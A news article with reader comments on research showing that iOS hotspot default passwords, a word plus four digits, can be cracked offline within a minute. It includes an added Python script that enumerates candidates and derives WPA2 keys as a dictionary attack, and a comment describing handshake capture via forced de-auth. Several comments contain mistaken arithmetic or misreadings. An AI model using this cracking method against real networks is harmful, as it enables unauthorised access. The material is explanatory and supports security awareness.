Researchers able to predict Apple iOS-generated hotspot passwords

Summary: Although iOS generates seemingly random passwords for its hotspots to eliminate the use of 'default' passwords, researchers at a German university have found that they are able to break these passwords in under a minute.

TOPICS: Security, Apple, iOS

Researchers at the University of Erlangen in Germany have found a flaw in the automatically generated pre-shared keys used by Apple's iOS personal hotspot: the keys are drawn from so small a space that they can be recovered in under a minute.

Under iOS, users can specify their own password to secure the device when it is used as a personal hotspot. For convenience and security, however, Apple pre-populates the password field with an automatically generated one, so that even users who never change the default are not exposed to attackers trying a fixed, vendor-wide default password.

However, according to the three researchers, the way these passwords are generated leaves them open to attack. According to their paper, Usability vs. Security: The Everlasting Trade-Off in the Context of Apple iOS Mobile Hotspots (PDF), each password is a short dictionary word followed by a four-digit number.

Each password is therefore different, but, the researchers note, an attacker can readily enumerate every password iOS could have chosen, because the words are drawn from a fixed list.

"This list consists of around 52,500 entries, and was originated from an open-source Scrabble crossword game. Using this unofficial Scrabble word list within offline dictionary attacks, we already had a 100 percent success rate of cracking any arbitrary iOS hotspot default password," the researchers wrote.

After capturing the Wi-Fi four-way handshake, the researchers used a single AMD Radeon HD 6990 GPU to try every word in the list with every four-digit suffix offline; exhausting the whole space took 49 minutes.

The words, however, are not drawn uniformly from the whole list. The researchers found that iOS only ever uses a small subset of the 52,500 entries.

"Only 1,842 different entries of that dictionary are taken into consideration. Consequently, any default password used within an arbitrary iOS mobile hotspot is based on one of these 1,842 different words."

This, combined with more cracking hardware, a cluster of four AMD Radeon HD 7970 GPUs, let the researchers recover any OS-generated iOS hotspot password within 50 seconds. Such hardware is out of reach of most users, but the researchers point out that equivalent capacity is readily rented from today's cloud computing providers.
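The attack described above (capture the handshake once, then search the word-plus-four-digit space offline) and the paper's recommendation of truly random defaults can be illustrated with a short Python script. This is an added example, not code from the researchers or from Apple. It assumes a constructed SSID "iPhone" (the SSID is the PBKDF2 salt in WPA2-PSK), a constructed six-word sample list standing in for the paper's 1,842-word subset, and, as a simplification, compares each guess's derived Pairwise Master Key against the victim's PMK directly; a real attacker instead checks each guess against the MIC in the captured four-way handshake. The guess rates are back-calculated from the article's own figures (52,500 x 10^4 candidates in 49 minutes; 1,842 x 10^4 in 50 seconds).

```python
"""Added example: offline dictionary attack on a word+4-digit hotspot PSK.

Assumptions (not from the paper): the SSID "iPhone", the sample word list,
and the shortcut of comparing PMKs directly instead of verifying the
handshake MIC.
"""
import hashlib
import hmac
import secrets
import string

WPA2_ITERATIONS = 4096   # PBKDF2-HMAC-SHA1 rounds fixed by IEEE 802.11i
PMK_LEN = 32             # the PMK is 256 bits

# Constructed sample list standing in for the paper's 1,842-word subset.
SAMPLE_WORDS = ["area", "head", "suite", "coast", "lane", "shore"]


def wpa2_pmk(passphrase: str, ssid: str, iterations: int = WPA2_ITERATIONS) -> bytes:
    """Derive the WPA2 Pairwise Master Key: PBKDF2-HMAC-SHA1(passphrase, ssid)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(),
                               iterations, PMK_LEN)


def candidate_passwords(words, digits: int = 4):
    """Enumerate every word followed by every zero-padded digit suffix."""
    for word in words:
        for n in range(10 ** digits):
            yield f"{word}{n:0{digits}d}"


def dictionary_attack(target_pmk: bytes, ssid: str, words, digits: int = 4,
                      iterations: int = WPA2_ITERATIONS):
    """Return (password, guesses), or (None, guesses) once the list is exhausted."""
    guesses = 0
    for cand in candidate_passwords(words, digits):
        guesses += 1
        if hmac.compare_digest(wpa2_pmk(cand, ssid, iterations), target_pmk):
            return cand, guesses
    return None, guesses


def search_space(word_count: int, digits: int = 4) -> int:
    """Number of word+digits candidates an attacker must consider."""
    return word_count * 10 ** digits


def implied_rate(space: int, seconds: float) -> float:
    """Guesses per second implied by exhausting `space` in `seconds`."""
    return space / seconds


def seconds_to_exhaust(space: int, rate: float) -> float:
    return space / rate


def strong_hotspot_password(length: int = 20) -> str:
    """What the paper asks for: a CSPRNG-drawn password over a large alphabet."""
    alphabet = string.ascii_letters + string.digits + string.punctuation
    return "".join(secrets.choice(alphabet) for _ in range(length))


def run_demo():
    """Recover a constructed victim password from the sample list."""
    ssid = "iPhone"                 # assumed SSID (PBKDF2 salt)
    victim_password = "area0312"    # constructed: word + four digits
    target = wpa2_pmk(victim_password, ssid)
    return dictionary_attack(target, ssid, SAMPLE_WORDS)


if __name__ == "__main__":
    found, guesses = run_demo()
    print(f"recovered {found!r} after {guesses} PBKDF2 derivations")
    full, used, wp8 = search_space(52_500), search_space(1_842), 10 ** 8
    rate_6990 = implied_rate(full, 49 * 60)     # one HD 6990, 49 minutes
    rate_7970x4 = implied_rate(used, 50)        # four HD 7970s, 50 seconds
    print(f"full list: {full:,} candidates, ~{rate_6990:,.0f} guesses/s")
    print(f"1,842 words: {used:,} candidates, ~{rate_7970x4:,.0f} guesses/s")
    print(f"WP8 eight digits: {wp8:,} candidates, "
          f"~{seconds_to_exhaust(wp8, rate_7970x4):,.0f} s at the faster rate")
    random_space = 94 ** 20   # 20 chars from the 94 printable ASCII symbols
    years = seconds_to_exhaust(random_space, rate_7970x4) / 3.15e7
    print(f"20 random printable chars: ~{years:.1e} years at that rate")
    print("example replacement:", strong_hotspot_password())
```

The expensive step is the PBKDF2 derivation, which is what the GPUs parallelise; the phone itself never sees a single failed login, because every guess is checked against the captured handshake, not against the device. Note also how little the four random digits help: they multiply the word list by 10,000, which the 1,842-word subset then gives straight back.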

The paper criticises the practice of making hotspot passwords easy to remember and calls on vendors to use truly random passwords as their defaults.

"In the context of mobile hotspots, there is no need to create easily memorisable passwords. After a device has been paired once by typing out the displayed hotspot password, the entered credentials are usually cached within the associating device, and are reused within subsequent connections," the paper states.

"System-generated passwords should be reasonably long, and should use a reasonably large character set. Consequently, hotspot passwords should be composed of completely random sequences of letters, numbers, and special characters."

It should be noted that Apple does, however, do more for consumers than the many vendors that simply ship a static default password. The paper also notes that Windows Phone and Android can have similar issues.

"Default passwords in Windows Phone 8 consist of only eight-digit numbers. As this results in a search space of 10^8 candidates, attacks on Windows-based hotspot passwords might be practicable. Moreover, while the official version of Android generates strong passwords, some vendors modified the wi-fi-related components utilised in their devices and weakened the algorithm of generating default passwords."


Michael Lee

About Michael Lee

A Sydney, Australia-based journalist, Michael Lee covers a gamut of news in the technology space including information security, state Government initiatives, and local startups.

  • 49 minutes is a long time

    For hackers to take to break into your network. One thing to note is that when you have a connection to your hotspot, you will see a message on the top part of your screen that your hotspot has X number of connections, so if you have one device connected to your hotspot and you notice that more than one device is connected, turn the hotspot off and change your password.
    • The other thing I found interesting was...

      The paper centered on finding the password and not actually (from what I could tell) logging on to the phone and getting the password authenticated. They were able to get a password and then have their program guess the password in about 1 minute using a high-end GPU. Is there any indication iOS can handle 390,000 login attempts/sec needed to achieve these break-in times? I mean, that is a flurry of traffic and processing on the phone side. If the phone is limited to 10 or 100 attempts/sec (a feature Apple does frequently to make brute force attacks harder), the times needed to actually crack the password could be 2-3 orders of magnitude higher. The report was ambiguous on this point.

      I found the distribution of word frequency interesting.

      It could be you just start sending out passwords and then you find out you are logged in.
      • Offline cracking

        The issue, and I didn't mention this in the article for technical brevity, is that an attacker only requires the WPA2 handshake when a Wi-Fi connection is made. They can either wait and quietly sniff this traffic, or they can force a de-auth and capture it when the client re-associates (although this is noisier and could arouse suspicion).

        With the handshake, an attacker can brute force the password offline. Up to this point, this is the same as any attack on WPA2. If you'd like to know more, I'd recommend taking a look at the Aircrack-ng suite of tools (for educational reasons, of course). The kicker here is that rather than brute-forcing every known possibility, which would take ages, there is a limited subset of possibilities that can easily be tested against.

        With the password cracked offline, iOS only ever sees the correct credentials entered and perhaps a de-auth attempt, if it is used. It never sees thousands of login attempts (and issues with network latency, if this approach was taken, would definitely slow things down).

        The moral of the story here is to make sure you use a different password than the one provided and keep a look out for any suspicious connections. That applies equally, no matter if you're using iOS, Android or any other mobile operating system.

        Michael Lee (Mukimu)
  • So Windows Phone is even easier to crack

    "Default passwords in Windows Phone 8 consist of only eight-digit numbers."

    So Windows Phone is even easier to crack, but giving the article an "Apple Fail" headline is much better for business.
    • It makes wintards feel better

      They don't have much to feel better about nowadays...
    • 1842 . .

      "Only 1,842 different entries of that dictionary are taken into consideration. Consequently, any default password used within an arbitrary iOS mobile hotspot is based on one of these 1,842 different words."

      1842 is basically a bit less than a 4 digit number. Almost as weak as a 3 digit number.
      • 1842 plus some...

        It's the word plus some numbers (not sure how many though). It's weak, but it still needs to be accurate.
        • Plus four.

          It's plus four. Which makes iOS somewhere between the strength of a 7 digit and an 8 digit number.

          It's better to just change the password regardless =).
    • Lets see

      So you got 1852 entries used in iOS for the password. And Windows Phone is 8 to the power of 10. Which gives you 1,073,741,824. Yup, you are right, even easier to hack. Really, in the end, does it matter? A hacker that wants to get into a device or system can if they really try. The randomizing of passwords is to deter the average hacker.
    • Wrong!

      That is all.
    • ..."but giving the article an "Apple Fail" headline..."

      Of course the article was "Apple Fail" orientated, since the research paper the article was explaining is titled "Usability vs. Security: The Everlasting Trade-Off in the Context of Apple iOS Mobile Hotspots", and being a helpful author instead of just posting the link, he did some research to show that other mobile OSes can have the same security hole as well.

      Don't defend Apple by saying "Well the other guys are doing it as bad so don't point at us"
  • So what happens while you are trying 1800

    Different wrong passwords to join the hotspot? Do you get locked out after three attempts? Do you get a forced increasing delay between each try? If you have to have a sixty minute cooling off period after your fifth wrong password attempt, your crack isn't worth much.

    These studies never take these factors into account when they scream about vulnerabilities.
    • It is an important consideration.

      There is no part of the report stating they actually LOGGED into a hotspot only that they were able to brute force the password with 390,000 guesses/sec when they already knew the password. I don't think iOS (or any mobile OS) could handle 390,000 authentication attempts/sec.

      Still cool research but a bit weak on some details.
    • Try reading

      And readers never take into account the actual article before they scream about inaccuracies in an article.

      If you read the article in detail and the actual research document you would have noticed that they can hack it OFFLINE once they have intercepted the handshake.

      "For this, an attacker needs to capture a 4-way handshake between a Wi-Fi enabled device and the mobile hotspot. Afterwards, brute force or targeted dictionary attacks can be conducted to determine the PSK within offline computations."
  • Change that password is the lesson.

    First: This is a rarely used feature. And probably highly dependent on whether your phone company allows tethering.

    Second: The lesson here is to change that default password to something secure.

    "This, combined with an increase in cracking hardware — a GPU cluster consisting of four AMD Radeon HD 7970s — allowed the researchers to crack any iOS hotspot with an OS-generated password within 50 seconds. Although such hardware is physically out of the reach of most users . . ."

    Many gamers likely have 2-3 video cards in tandem thanks to SLI/CrossFireX. Quad SLI *is* possible, but extremely expensive due to the need for both a specialized motherboard and four GPUs.

    Dual Radeon HD 7990s may actually do the job, as AMD is claiming they have more than double the TFLOPS of the 7970s.

    That being said, a hacker may be willing to wait 2 or 4 times as long, if they believe the hotspot will be open for a while.

    And it should be noted that these are desktop cards - hardly portable. If somebody's hauling around a big desktop at your airport . . .

    Of course, if it takes this much horsepower for what's essentially a dictionary attack, they haven't a chance if you were to simply change to a good random password. Change that password!
    • Average hackers probably won't even attempt this.

      Serious hackers on the other hand could sit in a public place and use a cloud computing service to grab stuff all day.

      It's highly unlikely that this would affect most people, but it's still good to know about.
  • Yeah, but

    who is going to be within 10 feet of you with mega powered computers, typing away to break into your hot spot, when it is so easy to just use any of the open wireless routers that are ubiquitous nowadays.

    Seems like this is much ado about nothing.
    • "who is going to be within 10 feet of you with mega powered computers...?"

      The guy with a laptop and an account at some large cloud computing service.
  • How to avoid this poor iOS password implementation?

    The best way available for an iOS device (or whichever device has a gyroscope and GPS) is to allow the user to choose a guess word and then shake the device (a classic symmetric crypto key generator). The position and the shake are truly random. Then the problem is solved (for a very long time) for a long key base.